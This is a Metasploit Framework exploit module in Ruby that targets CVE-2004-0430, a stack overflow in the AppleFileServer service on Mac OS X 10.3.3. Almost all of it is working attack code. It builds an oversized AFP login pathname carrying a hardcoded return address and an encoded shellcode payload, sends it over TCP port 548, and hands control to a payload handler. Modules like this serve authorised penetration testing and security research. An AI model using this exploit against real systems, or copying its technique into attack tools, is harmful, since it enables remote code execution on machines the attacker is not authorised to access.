GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/afp/loginext.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata for the AppleFileServer login-path stack overflow
  # (CVE-2004-0430). A single PPC target is defined, and its return
  # address is a fixed stack location, which is why the description
  # warns that it only works under optimal conditions and that the
  # service gives just one attempt.
  #
  # @param info [Hash] caller-supplied metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AppleFileServer LoginExt PathName Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the AppleFileServer service
          on MacOS X. This vulnerability was originally reported by Atstake and
          was actually one of the few useful advisories ever published by that
          company. You only have one chance to exploit this bug.
          This particular exploit uses a stack-based return address that will
          only work under optimal conditions.
        },
        'Author' => 'hdm',
        'License' => MSF_LICENSE,
        'References' => [
          %w[CVE 2004-0430],
          %w[OSVDB 5762],
          %w[BID 10271]
        ],
        'Payload' => {
          'Space' => 512,
          'BadChars' => "\x00\x20",
          'MinNops' => 128,
          'Compat' => { 'ConnectionType' => '+find' }
        },
        'Platform' => %w[osx],
        'Targets' => [
          # Target 0: the only supported build. 'Ret' is a stack address,
          # hence the limited reliability noted in the description.
          [
            'Mac OS X 10.3.3',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0xf0101c0c
            }
          ]
        ],
        'DisclosureDate' => '2004-05-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # AFP over DSI is served on TCP/548 by default.
    register_options([Opt::RPORT(548)])
  end

  # Connects, sends one crafted login request carrying the oversized
  # pathname, and then hands control to the payload handler. No retry is
  # attempted; the module's own description notes there is only one chance.
  #
  # @return [void]
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    shellcode = payload.encoded

    # Oversized pathname: 0xff filler with the target return address
    # written at offset 168 and the encoded payload placed directly after it.
    pathname = "\xff" * 1024
    pathname[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
    pathname[172, shellcode.length] = shellcode

    # AFP request body: fixed leading bytes, then the length-prefixed
    # protocol version and authentication-method strings.
    request = "\x3f\x00\x00\x00".dup
    ['AFP3.1', 'Cleartxt Passwrd'].each do |field|
      request << [field.length].pack('C') << field
    end

    # Type-3 (16-bit length-prefixed) user name, then the overflowing path.
    request << "\x03" << [9].pack('n') << rand_text_alphanumeric(9)
    request << "\x03" << [pathname.length].pack('n') << pathname

    # DSI header that precedes the AFP body on the wire.
    dsi_header = [
      0,              # Flags
      2,              # Command
      rand(65536),    # XID
      0,              # Data Offset
      request.length, # Data Length
      0               # Reserved
    ].pack('CCnNNN')

    sock.put(dsi_header + request)

    handler

    disconnect
  end
end